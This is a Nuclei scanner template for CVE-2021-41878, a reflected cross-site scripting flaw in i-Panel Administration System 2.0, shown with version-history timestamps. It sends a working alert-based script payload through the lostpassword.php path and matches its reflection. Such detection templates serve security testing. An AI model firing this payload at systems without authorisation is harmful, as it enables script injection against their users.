nuclei-templates/cves/2021/CVE-2021-41878.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2021-10-06 08:22:02 +00:00
id: CVE-2021-41878
info:
name: i-Panel Administration System - Cross-Site Scripting
2021-10-06 08:22:02 +00:00
author: madrobot
severity: medium
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
2021-10-06 08:22:02 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
2021-10-06 08:22:02 +00:00
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
2021-10-06 18:27:24 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
2021-10-06 08:22:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2021-10-06 08:22:02 +00:00
cve-id: CVE-2021-41878
cwe-id: CWE-79
2022-09-20 13:21:36 +00:00
metadata:
verified: true
2021-10-06 18:26:54 +00:00
tags: cve,cve2021,justwriting,xss
2021-10-06 08:22:02 +00:00
requests:
- method: GET
path:
2022-09-20 13:21:36 +00:00
- '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E'
2021-10-06 08:22:02 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-09-20 13:21:36 +00:00
words:
- "><img src=a onerror=alert("document.domain")>"
- "<title>i-Panel Administration System</title>"
condition: and
2021-10-06 08:22:02 +00:00
- type: word
2022-09-20 13:21:36 +00:00
part: header
2021-10-06 08:22:02 +00:00
words:
- "text/html"
2022-09-20 13:21:36 +00:00
- type: status
status:
- 200